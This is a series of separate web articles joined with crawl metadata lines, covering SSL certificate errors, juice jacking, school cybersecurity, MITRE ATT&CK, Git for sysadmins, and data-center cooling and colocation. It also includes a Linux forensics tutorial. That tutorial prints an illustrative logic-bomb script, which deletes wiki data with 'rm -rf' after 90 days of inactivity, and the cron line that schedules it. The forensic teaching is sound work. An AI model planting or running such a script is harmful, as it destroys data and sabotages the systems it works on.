Server certificates, also known as SSL certificates, are certificates that are used to verify the identity of a server for anyone who is trying to access it. The two most widely used types of server certificates are a RADIUS server certificate and a web server certificate.
An SSL certificate, when installed on a website, converts the protocol on the website to HTTPS from HTTP, an indicator that guarantees the authenticity of the website. Additionally, it also helps in encryption, thus keeping the information secure from potential hackers. The common name (CN) on RADIUS server certificates assures the connecting device that they are connected to the right server.
In this article, we will focus on the security error for server certificates and their fixes.
Security Warning: Untrusted Server Certificate
“Your connection is not private. Attackers might be trying to steal your personal or financial information from website/applicationname. This server could not prove that it is website/applicationname.”
This is an example of a message that displays when there is a security warning for an untrusted server certificate. The error message will contain additional details about the cause, such as:
- Failed revocation check
- Untrusted certificate authority (CA)
- Invalid certificate or associated chain
- The name on the certificate is incorrect
This information can help you understand the root cause and to resolve the error. The steps to check this information are as follows.
How to Check Untrusted Server Certificate Errors
There are two steps to determine the type of the error message in order to understand how to fix it. To explain these steps, we take the example error “Untrusted server certificate error due to CN being incorrect.”
- Click on “advanced” and you get a detailed message about the error. For example, “This server could not prove that it is www.rightserver.com. Its security certificate is from www.right-server.com. This may be caused by a misconfiguration or an attack intercepting your connection.”
- Click on the padlock > Details > View Certificate to get details on the certificate, such as the CN that is assigned to it. Online SSL checkers will also give you information on what is wrong with the certificate. In this example, the checker reports: "None of the common names in the certificate match the name that was entered (www.rightserver.com). You may receive an error when accessing this site in a web browser."
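You can do the same inspection programmatically. Here is a minimal sketch using Python's standard `ssl` module (the hostname is a placeholder) that prints the fields a browser checks:

```python
import socket
import ssl

host = "www.rightserver.com"  # placeholder: the server you are checking

context = ssl.create_default_context()
with socket.create_connection((host, 443), timeout=5) as sock:
    # The TLS handshake validates the chain; an untrusted or mismatched
    # certificate raises ssl.SSLCertVerificationError right here.
    with context.wrap_socket(sock, server_hostname=host) as tls:
        cert = tls.getpeercert()

print("Subject:", cert["subject"])   # includes the common name (CN)
print("Issuer: ", cert["issuer"])    # the certificate authority
print("Expires:", cert["notAfter"])  # compare against your system clock
```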
Types of Error Messages of Untrusted Server Certificate Errors
Name Mismatch Error
A name mismatch error means the CN (Common Name, the domain name of the server the certificate was issued for) or the domain name in the certificate does not match the address in the browser's address bar.
For example, if a certificate has the common name www.right-server.com and the domain name that you are trying to access is www.rightserver.com then the error that you get is a name mismatch error.
SSL Certificate Not Trusted Error
This usually means that the domain name in the certificate is not a match to the URL typed in the browser. This error could be triggered by simple factors for example your certificate is registered for www.examplesite.com and you typed https://examplesite.com.
Expired Certificate Error
This error could pop up primarily because of two reasons, the system date, time, month, or year does not match the expiry date on the certificate or the certificate has expired. Issuing a certificate and forgetting to renew it before it is due to expire is a pretty common mistake with self-managed certificates.
Certificate Revoked Error
This error could mean your certificate has been revoked by your certificate authority (CA), or that a wrong key was issued. It could also be because the website acquired the certificate using false credentials, either in error or intentionally. It is always safe to check with your CA when you get this error message.
How to Fix Untrusted Server Certificate Errors
Once you determine the details of the error, there are two primary ways you can apply to fix the issue.
Check for Time-Misalignment
Oftentimes, certificate issues are due to time misalignment. When the time and date of your machine differ from what the system expects, the certificate will show an error. This may happen if your machine is set up to use a local Network Time Protocol (NTP) server and you are trying to access the network from your home over a WiFi connection. Most machines nowadays are configured with a widely used NTP server, but you may still face an issue because of a time-zone change if you are traveling.
You can try to fix this problem by changing the time and date settings, then rebooting your system before trying to access your network.
To change the time and date settings on a Windows machine (which Google Chrome also relies on), follow the steps below:
- Right-click on the “Time & Date” that is on the bottom left section of the taskbar in your machine.
- Turn off the “Set time automatically” & “Set time zone automatically” options.
- Click the “Change” option under “Change date & time” to select the correct time, date, month, and year.
- Open “Services” from the search menu bar.
- Go to “Windows Time” and select the option “Automatic” from the drop-down for the option “Start-up Type” in the “General” section.
- Click ‘Start” under ‘Service Status” click on “OK” and then “Apply”
- Right-click on Windows Time and Start/Restart the Service. Once it is complete, reboot your computer to see if the error is fixed.
If the issue occurs when the machine has the correct time, it may be because of the network security infrastructure. In that case, try this next solution:
Resolve Untrusted Certificate
If the first step of checking and correcting the system time is not helpful, and you are trying to connect to an enterprise network, you will need to contact your IT administrator to resolve the issue. Depending upon the network infrastructure policies of your company, here are a few options your IT admins opt to resolve untrusted certificates.
- Procure and install a signed and trusted certificate. They would then apply this on your devices to resolve the untrusted server certificates.
- If the certificates are self-managed by your company’s IT, then they will try to fix the error by editing the certificate attributes.
- They may ask you to click “Trust Anyway” and continue connecting to the application or website.
Eliminate Untrusted Server Certificate Errors with SecureW2
Certificates are undoubtedly the most secure way to authenticate a user to an application, a website, or a network. For them to be an effective mechanism for network security, they require a not insignificant amount of infrastructure on the backend. Setting up a robust Public Key Infrastructure (PKI) requires detailed planning and in-depth knowledge, which can be difficult without prior experience. Distributing those certificates to devices, managed or BYOD, can be nearly impossible to scale without an onboarding solution.
SecureW2 offers simplified and easy-to-implement solutions that make the entire certificate lifecycle management process seamless. Our JoinNow MultiOS solutions are the most trusted by our customers. SecureW2 solutions automate the entire process of certificate configuration and eliminate the need for a configuration guide. Talk to our industry experts to learn more about our solutions.
Let’s tell you about a cyber attack that will leave you spellbound when you learn how it happens!
As you take a business trip, you wouldn't worry about the safety of the data on your device because it is secured with stringent IT controls. However, at some point, you discover that the data on your phone has been breached! How did this happen, despite implementing strict IT controls and following BYOD best practices?
Well, the data was breached when you decided to charge your device at a public charging station. You connected your device to a public USB port and there! Data was stolen as your device was kept for charging. In cyberspace, this is known as Juice Jacking attack.
What is Juice Jacking?
We know the utility of charging cables. They double up as a charger as well as a device to transfer data. Cybercriminals, however, take advantage of this functionality.
The charging cables available at public charging stations are loaded with malware. As soon as the device is plugged in, the device is infected with malware allowing the cyber attacker to easily access the device and expose vital business information, database, and credentials.
So, what are the ways to prevent Juice Jacking? We have some useful tips listed below.
The best practices to prevent Juice Jacking:
#1 Charge your devices
It is an ideal practice to charge your mobile devices before you leave for work. Charge your devices at home or in the office, where you know there is security and no risk of Juice Jacking. It is advisable to keep your phones topped up; otherwise, you may have to charge them in a location where USB charging ports are freely available but pose a great security risk.
#2 Adopt BYOC (Bring your own charger) policy
Companies today have embraced the BYOD (Bring your own device) culture. It's about time they go one step further and ask employees to bring their own chargers along with their devices. Employees who travel frequently and have the habit of charging their phones at public charging stations should be encouraged and reminded to carry their own chargers, which they know for sure are secure and free of malware.
#3 Keep your device locked
To secure the vital data and information on your device, keep it locked with a pattern, PIN, or biometrics. Suppose you run low on charge and have to connect to an unknown charging port: even if the device is subjected to Juice Jacking, the attacker will have a much harder time extracting information from a locked device. Avoid unlocking your phone, or leaving it unlocked and unattended, at the charging station.
#4 Use charge-only cables
Manufacturers have designed USB cables meant for charging only. Such cables omit the extra pins and wires used for data transmission and carry only the two power lines required to charge the device. Using charge-only cables is good practice: you will be spared Juice Jacking and its repercussions even if you charge your devices at a public charging station.
#5 Educate your employees
The best practice of all: train and educate employees about Juice Jacking and how it takes place, and encourage them to follow the practices mentioned above. Cyberattacks have become sophisticated, and attacks such as Juice Jacking remain largely unknown to most employees, so education is essential to combat them successfully.
Finally, as we enjoy the benefits of digitalization, we never know when we may be subjected to a cyberattack like Juice Jacking.
You may not even realize that the common act of charging your phone at a public charging station can pose a major cyber threat.
Take precautions before you plug in! | <urn:uuid:9f987242-9c6c-41ef-b93d-759505a9b709> | CC-MAIN-2024-38 | https://www.ilantus.com/five-ways-to-prevent-juice-jacking/ | 2024-09-13T18:16:42Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651535.66/warc/CC-MAIN-20240913165920-20240913195920-00141.warc.gz | en | 0.96228 | 784 | 2.53125 | 3 |
By Michael Webb, chief technology officer, Identity Automation.
With the rise of online curriculums and virtual learning in both K-12 and higher ed institutions, there has been a notable increase in technology dependence. This dependency on digital tools has not only exposed children to challenges related to cyberbullying, plagiarism, and online safety, but has also made school districts increasingly vulnerable to cyberattacks.
Risk abounds year-round, and to hackers, student data is among the most valuable information available. They know that students are using personal and financial data for the first time, and they find it easy to exploit students' lack of awareness about safeguarding their digital identities.
Countering such attacks with the proper resources and tools can be especially difficult if there is little to no room in the IT budget for enhanced cybersecurity efforts. According to a recent report released by the Center for Internet Security, approximately one in five K-12 organizations dedicate less than 1% of their budget to cybersecurity.
While technology continues to create endless opportunities for learning, the alarming lack of cyber defenses makes schools all the more alluring to sophisticated cybercriminals. As a result, the ever-growing data security challenge requires an effective approach to cybersecurity, one that begins with developing responsible, appropriate, and empowered use of technology through enhanced digital literacy.
Digital literacy starts with enhancing effective cyber skills through online awareness, (password safety, digital identity, phishing) and empowering students to protect their safety and privacy as much as possible. ISTE, the International Society for Technology in Education, defines digital literacy as including “the knowledge of and the ability to use digital technologies to locate, evaluate, synthesize, create, and communicate information. Being digitally literate includes having an understanding of the human and technological complexities of a digital media landscape. A student-friendly definition of digital literacy is using technology to explore, connect, create, and learn.” | <urn:uuid:33bdc916-febd-4126-95e1-98f23976d13c> | CC-MAIN-2024-38 | https://educationitreporter.com/tag/digital-security/ | 2024-09-15T00:49:56Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651601.85/warc/CC-MAIN-20240914225323-20240915015323-00041.warc.gz | en | 0.952004 | 391 | 3.3125 | 3 |
Hello Friend 🙂
In this part, we're going to learn about the methodology used in the forensic investigation of Linux machines.
Prerequisite: Basic knowledge of Linux OS & Command Line Skills
But first, let’s understand:
What is Digital forensics?
Digital forensics is the process of collecting, analyzing, and preserving digital evidence in a manner that is admissible in a court of law. It involves the investigation of electronic devices and digital storage media to obtain evidence related to a cybercrime, intellectual property theft, or other illegal activity.
Steps in Digital Forensics
- Identifying and preserving digital evidence
- Analyzing the data
- Presenting findings in a clear and concise manner.
Big Five Areas for Linux Forensics
[Processes] - Suspicious processes and network activity.
[Directories] - Suspicious directories holding malicious payloads, data, or tools to allow lateral movement into a network.
[Files] - Files that are malicious, likely tampered with, or otherwise out of place on a Linux host.
[Users] - Areas to check for suspicious user activity.
[Logs] - Log file tampering detection and common areas to check for signs someone has been covering their tracks.
How to Perform an Investigation on a Linux Machine
There are many cheat sheets on the internet that help you check all the points where useful information can be found. Some are HERE & HERE.
Note: There's no single golden cheatsheet that solves every case. Adversaries always use different kinds of tactics & techniques, so we also have to vary our own tactics & techniques during an investigation.
Here is the methodology (cheatsheet) I use during the initial investigation phase.
Case story: One of the company's IT employees was fired a few weeks ago. Today the SOC analyst notices activity under that employee's SSH credentials (the sysadmin forgot to remove the account from the server) on one of the company's main servers, so the SOC immediately calls us in to investigate the Linux server and find out what the former employee has done.
We log in via SSH with the server's root credentials & go straight to log monitoring. Luckily the adversary didn't delete the logs (and even if he had, we keep backups on another system :/)
First, we check auth.log (it records authentication events and privileged actions performed by users across the system).
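A couple of hedged examples of what we might run here (the log path is the Debian/Ubuntu default and the patterns are illustrative; adjust for your distribution):

grep -iE "useradd|adduser" /var/log/auth.log   # account-creation events
grep "sudo" /var/log/auth.log | less           # commands executed with root privilege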
Ok, so according to the logs, cybert (the former employee's account) used sudo (root privilege) to create a new user, "it-admin".
At the bottom of the logs we can see that he opened visudo (the sudoers file editor) with sudo. He probably added his new account to the sudoers policy so that it could run ALL commands with root privilege (perhaps a small persistence step).
He then switched from cybert to that new user (it-admin).
After that, as it-admin, he created a script (bomb.sh) using vi (and if he used vi, then vi also left a record; let's look at that later) & surprisingly, he (cybert) then deleted the it-admin account.
That's strange: why create a high-privilege account & then delete everything? It suggests that he (cybert) had no intention of keeping persistent access to the system.
Ok, now let's move from the logs to other places where we can find more information. Remember the .bash_history file? It stores the commands a user has run in their shell (terminal). Let's check the one belonging to this new user (it-admin).
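For example (the path assumes it-admin's home directory survived the account deletion):

cat /home/it-admin/.bash_history   # every command the account ran in its shell
ls -la /home/it-admin/             # other dotfiles, such as .viminfo, live here too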
We also see a .viminfo file, so it looks like he used vi to edit something, but first let's analyze .bash_history.
Hmm, the adversary downloaded some kind of malware from his C2 server.
I searched the whole system for this script (bomb.sh) but didn't find it; it seems the attacker did something with it.
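A hedged example of such a search:

find / -type f -name "bomb.sh" 2>/dev/null   # no hits: the file was moved, renamed, or deleted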
So let's check that .viminfo file to see vi's cached state.
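Recently edited files are recorded in .viminfo's file marks; a quick way to list them (same assumed path as above):

grep "^>" /home/it-admin/.viminfo   # lines starting with ">" name recently edited files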
Ok, so he renamed the script to os-update.sh & saved it in a more crowded directory (to make it less suspicious).
Check this malware/script code.
According to the code, it waits to see whether the user "it-admin" (which the adversary deleted) logs in within 90 days. If not, the script deletes all data in /dokuwiki (which holds our important configs, API keys, etc.) & leaves a revenge message.
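The attacker's exact payload isn't reproduced here, but a minimal sketch of this kind of logic bomb could look like the following. The marker path, file names, and message are illustrative assumptions, not the recovered code:

#!/bin/bash
# Illustrative sketch only. Assume a login hook refreshes the marker file
# whenever it-admin logs in; the bomb fires once the marker is 90+ days old.
marker=/var/log/.it-admin-last-seen   # hypothetical marker file
if [ -n "$(find "$marker" -mtime +90 2>/dev/null)" ]; then
    rm -rf /dokuwiki/*                                      # wipe the wiki data
    echo "You should not have fired me." > /dokuwiki/README # revenge note (invented text)
fi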
Remember how we saw that the crontab was opened with nano? This script is almost certainly scheduled as a job. Check /etc/crontab.
And yes, cron will run this script every day at 8:00 AM, & the script checks the 90-day it-admin inactivity condition. It's basically a logic bomb that triggers when certain conditions are met.
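In /etc/crontab, such an entry would look roughly like this (the script's path is an assumption based on the "crowded directory" observation):

0 8 * * * root /bin/os-update.sh   # minute hour day-of-month month day-of-week user command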
Perfect, we successfully handled this case. Now we can report to the authorities & the sysadmin, who can remove the adversary's malware and accounts & revert the changes he made.
That's it! Maybe next we'll cover Android forensics.
Check Blue Team Bootcamp’s previous parts HERE & HERE & HERE.
If you want to support us with a coffee, then ping us here.
Questions or suggestions for a new topic? Ping me on my socials | <urn:uuid:228f5190-312c-4dbf-9b26-52a81624026f> | CC-MAIN-2024-38 | https://hacklido.com/blog/403-blue-team-bootcamp-series-p4-linux-forensic-a-practical-approach-for-uncovering-digital-evidence | 2024-09-15T00:03:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651601.85/warc/CC-MAIN-20240914225323-20240915015323-00041.warc.gz | en | 0.920092 | 1,193 | 2.953125 | 3 |
The MITRE ATT&CK framework is a knowledge base of adversary tactics and techniques built from real-world observations. It stands for MITRE Adversarial Tactics, Techniques, and Common Knowledge and provides a systematic way to categorize and describe the actions that adversaries take when compromising information systems.
This framework aids cybersecurity professionals in understanding how adversaries operate and in developing effective defense strategies. The framework is widely adopted across various industries and sectors due to its detailed, continuously updated, and practical approach to cybersecurity.
This is part of a series of articles about network attacks
The MITRE ATT&CK framework was developed by the MITRE Corporation, a not-for-profit organization that operates multiple federally funded research and development centers. It was created to provide a compendium of known attack tactics and techniques observed in real-world incidents.
Its development began in 2013 when MITRE started compiling detailed descriptions of adversary behaviors based on studies of real-world attacks. The framework was publicly released in 2015 and has been regularly updated since.
Initially intended to improve post-attack analysis and forensics, the framework has evolved to serve broader security needs including threat detection, analysis, and simulation. It includes the tactics, techniques, and procedures (TTPs) used by threat actors, helping organizations to better understand security threats and strengthen their defenses.
The MITRE ATT&CK framework and the Lockheed Martin Cyber Kill Chain model both provide methodologies for tracking and analyzing cyber attacks, but they differ in scope and detail.
The Cyber Kill Chain model outlines the stages of a cyber attack from initial reconnaissance to exfiltration of data. It comprises seven phases: reconnaissance, weaponization, delivery, exploitation, installation, command and control (C2), and actions on objectives.
MITRE ATT&CK covers a broader spectrum, including post-compromise techniques and lateral movement within a network. MITRE’s approach provides a more in-depth, technique-specific insight across different platforms and is continually updated to reflect evolving threats, making it more dynamic and adaptable for modern security professionals.
The framework includes several matrices related to different security contexts.
The Enterprise Matrix covers techniques used by adversaries to compromise enterprise networks (the networks of commercial, government, or other entities). It categorizes techniques under various tactics which represent the different stages of an attack, such as initial access, execution, persistence, and exfiltration.
The Mobile Matrix addresses security threats to mobile environments, cataloging common adversary tactics and techniques affecting mobile platforms. It details how threat actors exploit vulnerabilities in mobile operating systems, apps, and services. Typical use cases include securing corporate mobile devices and developing secure mobile applications.
The Industrial Control Systems (ICS) Matrix focuses on techniques that affect industrial systems, commonly found in critical infrastructure sectors like energy, manufacturing, and transportation. It catalogs attack techniques that disrupt ICS operations, such as control process manipulation and ladder logic modification.
The MITRE ATT&CK framework is organized into matrices that outline different stages of an adversary’s attack lifecycle, known as tactics, and the specific methods they use, known as techniques.
Tactics represent the “why” of an attack technique. They are the adversary’s tactical goals during an attack, such as achieving initial access, maintaining persistence, or executing malicious code. Each tactic category includes a range of techniques that adversaries use to achieve these goals.
Examples of tactics include:
- Initial access: gaining an initial foothold in the target environment.
- Persistence: maintaining access across restarts and credential changes.
- Exfiltration: stealing data from the compromised network.
Techniques are the methods by which adversaries achieve their tactical goals. Each technique may be further broken down into sub-techniques, which provide more granular details on how an adversary accomplishes a particular method.
Examples of techniques include:
- Phishing (initial access): sending deceptive messages to obtain credentials or deliver malware.
- Obfuscated files or information (defense evasion): using complex encoding or encryption to avoid detection.
- OS credential dumping (credential access): extracting account credentials from the operating system.
The framework is useful for informing different aspects of an organization’s security strategy. It is commonly used for:
Red teaming: Simulates realistic cyber attacks based on known adversary behaviors. The framework’s detailing of attack techniques helps these teams in planning and executing operations that test organizational defenses.
MITRE Engenuity is a tech foundation launched by the MITRE Corporation to advance its public interest work through partnerships with the private sector, academia, and government. Its purpose is to foster innovation and collaboration on challenges that demand public good solutions, including cybersecurity and next-generation technology like artificial intelligence and quantum computing.
The foundation focuses on projects that extend the capabilities of the MITRE ATT&CK framework. Key projects and initiatives include:
Engenuity Open Generation 5G: Promotes the secure development and deployment of 5G technologies by creating open, adaptable frameworks and best practices for industry stakeholders.
Here’s an overview of how organizations can use MITRE ATT&CK.
The MITRE ATT&CK framework helps organizations build a comprehensive cybersecurity strategy. Mapping out potential attack paths and prioritizing defenses based on known methods allows teams to create a focused, effective security posture.
Strategies built around the framework are resilient, adaptable, and preemptive, anticipating attacks before they occur. This planning process is essential for maintaining the integrity and continuity of IT operations across all types of enterprises.
Adversary emulation involves simulating attacks to test defenses. Using the MITRE ATT&CK framework, organizations can map out scenarios that use known adversary tactics and techniques to challenge their security systems. This process helps identify weaknesses in defensive measures and drives improvements in incident response strategies.
Planning and executing such simulations provide critical insights into an organization’s readiness, enhancing overall cybersecurity health through continuous refinement and reassessment of tactics and controls.
The MITRE ATT&CK framework allows organizations to review and identify vulnerabilities in their security infrastructure by comparing existing defenses against known adversary behaviors. By understanding where gaps exist, security teams can prioritize the relevant improvements and implement more effective mitigations.
This gap analysis is important for strengthening defenses against targeted attacks and improving the overall security landscape of an organization.
Integrating threat intelligence with the MITRE ATT&CK framework improves an organization’s ability to anticipate and respond to threats. By aligning real-time intelligence about active threats with the framework’s structured data on adversary tactics and techniques, organizations can quickly adapt their security measures to address emerging threats.
This integration transforms reactive security postures into proactive defenses, significantly reducing the risk of successful cyber attacks and ensuring continuous security improvements.
Cynet emerged as a top performer in the 2023 MITRE ATT&CK Evaluation, achieving impressive results that placed it ahead of many other vendors in multiple crucial sectors.
Given the diverse threat landscape, cybersecurity solutions need to be agile, robust, and comprehensive. Cynet’s performance in the 2023 MITRE ATT&CK Evaluation is an affirmation of its capabilities and its commitment to providing advanced detection solutions for businesses and organizations.
| <urn:uuid:994861b6-f674-4a23-a23c-168fea6f674> | CC-MAIN-2024-38 | https://www.cynet.com/network-attacks/quick-guide-to-mitre-attck-matrices-tactics-techniques-more/ | 2024-09-15T00:42:16Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651601.85/warc/CC-MAIN-20240914225323-20240915015323-00041.warc.gz | en | 0.929779 | 1,442 | 2.65625 | 3 |
Most people who know about Git think of it as a repository for software projects. It's actually more than that. It's valuable for any kind of file, especially text files that get periodic updates. Git is a valuable resource not just for programmers, but also for system administrators.
In addition to source code, a Git repository can hold configuration files, scripts, and text documentation.
Benefits to Sysadmins
Using a repository makes the administrator’s life easier in many ways.
- It keeps a history of changes, making it easier to fix problems. If a new version of a file breaks the system, getting the previous one back is easy. If something is misbehaving, comparing the latest version with the one before helps to isolate the problem.
- Tracking changes is a good discipline. Each newly committed version should include a brief comment explaining the reason for the change. Sometimes it’s necessary to go back several versions and figure out why a change was made.
- A shared repository makes it easier for people to collaborate. Git includes features to prevent inadvertent overwriting of one another’s work.
- Git supports branches. You can try something out in a private branch and merge it into the mainstream if it works.
- Configurations and scripts can become part of the DevOps cycle. They can undergo automated testing each time they’re committed, along with application code.
Only files which people work on should be in the repository. Ones which software creates from them, such as generated documentation and binary files, shouldn’t be. Git works best with plain text files, where it stores differences between one version and the next very efficiently. You can use it for images and binaries, but the repository could become huge over time. Whatever approach you choose, never put highly confidential information, such as passwords and keys, into a Git repository.
The whole history, including changes committed by others, is in your repository. You can see what changes others made, as well as your own.
A Quick Introduction to Git
Git is free, open-source software for creating and maintaining distributed file repositories. It’s the invention of Linus Torvalds, who is best known for creating Linux. The word “distributed” is important. Unlike older version control software, such as CVS and Subversion, each participant has a personal repository. People on a team make changes locally, then push them to the team’s central repository. This lets them work offline and not give changes to others until they’re ready.
The central repository can be public or private. GitHub is the biggest and best known, but it’s not mandatory. Anyone can create a repository on a server.
You can use Git from the command line or from a GUI client. The client can be standalone or part of a larger application. Many options are available.
Unless you’re working from an existing repository, the first step is to create one on your own machine. It will be associated with a directory where you do your work. You can add a public repository later after you’re sure it’s a worthwhile project. You should create a .gitignore file to indicate types of files that don’t belong there.
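For instance, a first-time setup might look like this (the directory name and ignore patterns are illustrative):

cd ~/sysadmin-configs        # hypothetical working directory
git init                     # create the local repository
printf '%s\n' '*.log' '*.bak' 'secrets/' > .gitignore   # keep generated files and secrets out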
Add the Files You Need
At first, it’s empty, and you have to add files to it. The way Git handles adding and committing files is different from most source control systems, and it confuses everyone at first. When you create a file, it doesn’t automatically go into the repository. Git uses a staging area between your working files and the repository. You first have to stage your files. Then, when you’re ready, you commit them.
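The basic cycle looks like this (the file names are examples):

git add nginx.conf backup.sh      # stage the files you changed
git status                        # review what is staged
git commit -m "Tighten TLS settings; fix backup cron path"   # record the change with its reason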
When you’re ready to share the project, or if you just want the extra safety of a copy that isn’t on your machine, you can create a matching repository on the central Git server. You then add a connection from your repository to the remote one and push your current state to it. The changes to your own repository don’t automatically sync to the remote when you commit them; you have to push them. This lets you wait till you’re sure the changes are ready to share.
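With the remote created, the commands might look like this (the URL and branch name are assumptions):

git remote add origin git@gitserver.example.com:ops/sysadmin-configs.git   # hypothetical remote
git push -u origin main   # publish your commits; -u remembers the upstream for future pushes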
Other users can now clone the shared repository. Cloning creates a copy on their machines. They can then pull changes from it and see everything you’ve committed. They can commit their own changes and push them. You can also give some users read-only access, letting them clone and pull but not push.
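On a teammate's machine, that workflow is just (same hypothetical URL):

git clone git@gitserver.example.com:ops/sysadmin-configs.git   # one-time local copy
git pull   # later, fetch and merge changes others have pushed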
Types of Repositories
There are many ways to set up a remote.
- GitHub and GitLab offer private repositories to paying customers.
- You can set up and run a Git server on your own machine or a virtual cloud-based machine.
- Cloud development services provide their own Git repositories, such as Azure Repos. It’s free for teams of up to five users and allows unlimited private repositories.
All implementations provide the same features, and you can move a Git repo from one place to another whenever you like.
Types of Clients
The choice of clients for Git is even bigger. The command line gives the full power of the software, but it’s complicated and takes some time to learn well. Any self-respecting administrator should be up to the challenge. For occasional use, though, there are alternatives which are easier to use.
Various GUI applications are available. Not all of them allow full access to all Git functionality. In addition, Git clients are often built into developer software. Emacs includes some Git support, but many people find that add-ons, such as Magit, allow easier use. IDEs often include a client.
For serious use, the command line is best. It provides all the functionality and doesn’t disguise any of the steps.
A Valuable Tool
Tracking changes is important in both program source files and administration-related files. The reasons are similar in both cases: better collaboration, ability to recover from mistakes, and access to a project’s history. The DevOps paradigm makes administrators part of the team that updates, tests, and releases projects, and it works best if everyone uses the same tools. Using Git lets administrators manage change better.
AgileDevOps removes silos between IT operations and development teams, bridging the gap from traditional infrastructure deployment process to modern cloud DevOps. To find out how we can help, request a free quote today.
| <urn:uuid:a0e4a981-1461-4bfd-8616-19f7a58bb9df> | CC-MAIN-2024-38 | https://agileit.com/news/git-system-administrators/ | 2024-09-17T09:24:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00741.warc.gz | en | 0.926244 | 1,378 | 2.828125 | 3 |
The role of the data center is rapidly evolving. With our reliance on digital services growing, and the prospect of a future virtual world, this demand is not expected to slow down.
There’s already plenty of attention on the role that data centers will play. It’s no surprise then, that providers are recognising the wealth of opportunities, with cloud and colocation being forecasted by Omdia to grow at a five-year CAGR of 16.6 percent and 8.3 percent respectively.
At the same time, data center providers are embracing strict policies to drastically reduce their carbon emissions in order to help achieve sustainability targets.
Data center sustainability
Major data center operators have signed The Climate Neutral Data Center Pact, and many more are moving in the same direction; the industry has committed to climate neutrality by 2030, ensuring that sustainability is now a key element of any business process.
With this in mind, chilled-water systems are a viable way for data center providers to not only support their growth cost-effectively and with minimal disruption, but also reduce their carbon footprint and help meet sustainability objectives.
Reducing emissions involves two fundamental aspects: cutting direct emissions and cutting indirect emissions.
Reduction of the direct emissions (refrigerant GWP)
Global warming potential (GWP) describes the relative impact of a greenhouse gas, and the timespan that it remains active in the atmosphere, compared to a base of CO2. The lower this metric, the lower the atmospheric impact.
The traditional refrigerants can now be replaced by modern HFO (hydrofluoro-olefin) refrigerants, which have a lower GWP; it is expected that this will prevent the emissions of up to 105 million tons of equivalent CO2 by 2040.
However, most of these new refrigerants are classified by ASHRAE (American Society of Heating, Refrigerating and Air-Conditioning Engineers) as mildly flammable, therefore requiring a new design for the cooling system and potentially impacting the broader data center design.
Chilled-water systems offer an excellent solution as the refrigerant is contained within chiller units and, in most applications, these are installed outside of the data center, thus simplifying the use of flammable fluids.
Chilled-water systems are one of the first cooling technologies to apply low GWP refrigerants in data center applications and therefore are an example of a valid alternative for reducing direct environmental impacts.
Reduction of the indirect emissions (cutting energy consumption)
Reducing carbon footprint also means cutting the electricity consumed by a data center during its operation. This is where chilled-water systems can play a big role. In recent years, they have applied a range of cooling system efficiency improvements that allow a reduction of electricity usage.
For example, in a chilled water system, the chiller compressor is the greatest consumer of electricity, and the warmer the external climate, the greater the electricity demand of the compressor.
Recently, there has been an increased use of inverter-driven compressors which help to achieve higher efficiency levels, especially at partial loads. Chillers equipped with inverter driven screw compressors, or oil-free centrifugal compressors, are now available to drastically cut down electricity consumption compared to the previous technology available.
Over the past few years, ASHRAE has increased the recommended operating temperature of data center equipment up to 27°C. This has allowed subsequent increases to the water temperatures within chilled-water systems and has enabled an extended use of freecooling chillers, even in countries where freecooling was not previously feasible.
Freecooling technology has an important advantage as it allows for the cooling of the system without activation of the compressor.
The adiabatic technology can additionally improve the efficiency of a chilled-water system. In these systems, the ambient air is cooled down by passing through wet pads. The air is then delivered at a lower temperature, achieving a higher freecooling capacity of the chiller and a more efficient operation of the compressor.
The core of this solution is the unit's onboard controller: it enables the use of water only when strictly needed, according to redundancy, efficiency, or cooling demand requirements.
The controller's main responsibility is to prevent water from being wasted, improving the data center's WUE (water usage effectiveness). Applying water is always a matter of balancing different requirements and constraints.
Further improvements to data center efficiency can be made by optimizing chilled-water system controls. A chilled plant manager coordinates the operation of all units and major components of the chilled-water system, integrating their working modes to improve efficiency and performance at partial loads and, in the unlikely event of a failure, reacting in the best way to maintain cooling continuity.
By combining all these technology optimizations, chilled-water systems can significantly reduce both direct and indirect emissions.
[Table omitted: example results for London, where the system never fully works in direct expansion mode, granting excellent system efficiency and reduced costs. Key: pPUE = partial power usage effectiveness (attributable to the cooling system); WUE = water usage effectiveness; TEWI = total equivalent warming impact.]
Scaling with confidence
An example of how chilled-water systems can achieve these benefits is in the case of Green Mountain, a Norwegian hydro-powered data center where the thermal management system plays a big role.
Green Mountain gained five megawatts of additional cooling capacity after the installation of Vertiv’s chilled water units, demonstrating how these systems, as part of a broader strategy, can facilitate carbon neutral data center configurations.
Many hyperscale and colocation providers are now embracing the opportunity chilled-water systems present, not only from a cost and speed of deployment perspective, but with sustainability front and center.
This needs to continue as we move into the next phase of the race for expanding capacity and improving the data center carbon footprint.
With such rapid expansion and increasing pressure to achieve net-zero, data center providers must rely on new technologies to meet the requirements of both today and tomorrow.
To learn more about chilled water systems and the benefits they bring to data center applications, download the free white paper, 'How chilled water systems meet data center availability and sustainability goals.'
| <urn:uuid:1f01e6e0-bcd7-4bcd-9767-994861b6f674> | CC-MAIN-2024-38 | https://direct.datacenterdynamics.com/en/opinions/a-chilled-approach-to-sustainability/ | 2024-09-17T07:55:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00741.warc.gz | en | 0.923167 | 1,397 | 2.8125 | 3 |
In today's digital age, data centers play a crucial role in supporting our ever-increasing demand for digital services. As the volume of data being processed and stored continues to grow exponentially, the need for efficient data center cooling becomes paramount.
In this article, we will explore the best practices for data center cooling, starting with an understanding of colocation and an overview of current cooling technologies.
Colocation refers to the practice of housing servers and other IT infrastructure in a shared facility rather than maintaining them in-house. This allows businesses to benefit from economies of scale and access to robust infrastructure without the substantial cost of building and maintaining their own data centers.
Colocation providers play a crucial role in the modern digital landscape by offering a comprehensive suite of services to businesses. Alongside providing physical space for housing servers and IT infrastructure, colocation providers also offer a range of vital services.
These include robust power solutions to ensure uninterrupted operation, efficient cooling systems to maintain optimal temperature levels, stringent security measures to safeguard valuable data, and reliable network connectivity to enable seamless communication and access to the internet.
By outsourcing these critical functions to colocation providers, businesses can focus on their core competencies while enjoying the benefits of a highly secure, scalable, and resilient IT environment.
Overview of Data Center Cooling Technologies
